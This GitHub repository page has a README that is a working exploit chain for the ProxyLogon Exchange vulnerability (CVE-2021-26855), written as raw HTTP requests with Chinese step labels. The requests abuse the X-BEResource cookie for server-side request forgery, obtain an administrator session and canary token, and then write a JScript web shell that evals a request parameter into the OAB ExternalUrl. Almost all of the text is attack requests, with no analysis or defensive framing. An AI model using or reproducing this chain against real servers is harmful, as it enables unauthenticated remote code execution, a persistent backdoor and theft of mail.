Skip to content

MacAsure/cve-2021-26855

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

2 Commits

README.md

README.md

 
 

Repository files navigation

cve-2021-26855

GET /ecp/x.png HTTP/1.1
Host: 192.168.170.134
Cookie: X-BEResource=localhost~1942062522
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?10
Te: trailers
Connection: close

# 获取DN值

POST /ecp/x.png HTTP/1.1
Host: 10.255.200.20
Cookie: X-AnonResource=true; X-AnonResource-Backend=localhost/ecp/default.flt?; X-BEResource=EXCHANGE01/autodiscover/autodiscover.xml?a=~1942062522
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0
Content-Type: text/xml
Content-Length: 343
Connection: close

<Autodiscover xmlns="http://schemas.microsoft.com/exchange/autodiscover/outlook/requestschema/2006">
<Request>
<EMailAddress>lili@xihongdream.com</EMailAddress>
                <AcceptableResponseSchema>http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a</AcceptableResponseSchema>
</Request>
</Autodiscover>



/o=xihongdream/ou=Exchange Administrative Group (FYDIBOHF23SPDLT)/cn=Recipients/cn=e9bf522287a54c07ba1b9a9439f081bc-lili

POST /ecp/x.png HTTP/1.1
Host: 10.255.200.20
Cookie: X-BEResource=Administrator@EXCHANGE01.xihongdream.com:444/mapi/emsmdb?MailboxId=f26bc937-b7b3-4402-b890-96c46713e5d5@exchange.lab&a=~1942062522;
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0
X-Clientinfo: {2F94A2BF-A2E6-4CCCC-BF98-B5F22C542226}
X-Clientapplication: Outlook/15.0.4815.1002
X-Requestid: {E2EA6C1C-E61B-49E9-9CFB-38184F907552}:123456
X-Requesttype: Connect
msExchLogonMailbox: S-1-5-21-2706396224-3788800485-1262849735-500
Content-Type: application/mapi-http
Content-Length: 142
Connection: close

/o=xihongdream/ou=Exchange Administrative Group (FYDIBOHF23SPDLT)/cn=Recipients/cn=e9bf522287a54c07ba1b9a9439f081bc-lili


S-1-5-21-2706396224-3788800485-1262849735-3585

# 获取Session,msExchEcpCanary

POST /ecp/x.png HTTP/1.1
Host: 10.255.200.20
Cookie: X-BEResource=Administrator@EXCHANGE01.xihongdream.com:444/ecp/proxyLogon.ecp#~1942062522;
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0
msExchLogonMailbox: S-1-5-21-2706396224-3788800485-1262849735-500
Content-Type: text/xml; charset=utf-8
Content-Length: 83
Connection: close

<r at="Negotiate" ln=""><s>S-1-5-21-2706396224-3788800485-1262849735-3585</s></r>


ASP.NET_SessionId=c897b0d2-4bc1-40ce-a449-9d65d43276e9;
msExchEcpCanary=jwpquzNMEEyRaXH6LhHEJBqGxCzwG9sIO7BTgjy0e4DxjF0s6fVmLcP-InroQca6cPxscclNbS0.;

-----------------
POST /ecp/x.png HTTP/1.1
Host: 10.255.200.20
Cookie: X-BEResource=@EXCHANGE01:444/ecp/proxyLogon.ecp#~1942062522;
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0
msExchLogonMailbox: S-1-5-21-2706396224-3788800485-1262849735-500
Content-Type: text/xml; charset=utf-8
Content-Length: 348
Connection: close

<r at="Negotiate" ln=""><s>S-1-5-21-2706396224-3788800485-1262849735-500</s></r>


-----------------
POST /ecp/x.png HTTP/1.1
Host: 10.255.200.20
Cookie: X-BEResource=Administrator@EXCHANGE01.xihongdream:444/ecp/proxyLogon.ecp#~1942062522;
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0
msExchLogonMailbox: S-1-5-20
Content-Type: text/xml; charset=utf-8
Content-Length: 348
Connection: close

<r at="Negotiate" ln="john"><s>S-1-5-21-2706396224-3788800485-1262849735-5529</s><s a="7" t="1">S-1-1-0</s><s a="7" t="1">S-1-5-2</s><s a="7" t="1">S-1-5-11</s><s a="3221225479" t="1">S-1-5-5-0-6948923</s></r>

# 获取OAB id

POST /ecp/x.png HTTP/1.1
Host: 10.255.200.20
Cookie: X-BEResource=X-BEResource=@EXCHANGE01:444/ecp/DDI/DDIService.svc/GetList?schema=VirtualDirectory&msExchEcpCanary={msExchEcpCanary}&#~1942062522; ASP.NET_SessionId={sessid}; msExchEcpCanary={msExchEcpCanary};
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0
msExchLogonMailbox: S-1-5-21-2706396224-3788800485-1262849735-500
Content-Type: application/json; charset=utf-8
Content-Length: 244
Connection: close

{"filter":  
    {"Parameters":  
        {  
            "__type": "JsonDictionaryOfanyType:#Microsoft.Exchange.Management.ControlPanel",  
            "SelectedView": "",  
            "SelectedVDirType": "OAB"  
        }  
    }  
}


-----------------------------------

POST /ecp/x.png HTTP/1.1
Host: 10.255.200.20
Cookie: X-BEResource=X-BEResource=@EXCHANGE01:444/ecp/DDI/DDIService.svc/GetList?schema=VirtualDirectory&msExchEcpCanary={msExchEcpCanary}&#~1942062522; ASP.NET_SessionId={sessid}; msExchEcpCanary={msExchEcpCanary};
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0
msExchLogonMailbox: S-1-5-21-2706396224-3788800485-1262849735-500
Content-Type: application/json; charset=utf-8
Content-Length: 244
Connection: close

{"filter":  
    {"Parameters":  
        {  
            "__type": "JsonDictionaryOfanyType:#Microsoft.Exchange.Management.ControlPanel",  
            "SelectedView": "",  
            "SelectedVDirType": "OAB"  
        }  
    }  
}

----------------------------

POST /ecp/x.png HTTP/1.1
Host: 10.255.200.20
Cookie: X-BEResource=Administrator@EXCHANGE01:444/ecp/DDI/DDIService.svc/GetObject?schema=OABVirtualDirectory&msExchEcpCanary={msExchEcpCanary}&a=~1942062522; ASP.NET_SessionId={sessid}; msExchEcpCanary={msExchEcpCanary};
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0
msExchLogonMailbox: S-1-5-21-2706396224-3788800485-1262849735-500
Content-Type: application/json; charset=utf-8
Content-Length: 244
Connection: close

{  
    "filter": {  
        "Parameters": {  
            "__type":  
            "JsonDictionaryOfanyType:#Microsoft.Exchange.Management.ControlPanel",  
            "SelectedView": "",  
            "SelectedVDirType": "All"  
        }  
    },  
    "sort": {}  
}

POST /ecp/x.png HTTP/1.1
Host: 10.255.200.20
X-BEResource=@EXCHANGE01:444/ecp/DDI/DDIService.svc/SetObject?schema=OABVirtualDirectory&msExchEcpCanary={msExchEcpCanary}&#~1941962754; ASP.NET_SessionId={sessid}; msExchEcpCanary={msExchEcpCanary};
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0
msExchLogonMailbox: S-1-5-21-2706396224-3788800485-1262849735-500
Content-Type: application/json; charset=utf-8
Content-Length: 244
Connection: close

{  
    "identity": {  
        "__type": "Identity:ECP",  
        "DisplayName": "OAB (Default Web Site)",  
        "RawIdentity": oabid  
    },  
    "properties": {  
        "Parameters": {  
            "__type": "JsonDictionaryOfanyType:#Microsoft.Exchange.Management.ControlPanel",  
            "ExternalUrl": f"http://x/#<script language="JScript" runat="server"> function Page_Load(){/**/eval(Request["api"],"unsafe");}</script>"  
        }  
    }  
}

About

No description, website, or topics provided.

Resources

Readme
Activity

Stars

0 stars

Watchers

1 watching

Forks

0 forks
Report repository

Releases

No releases published

Packages

No packages published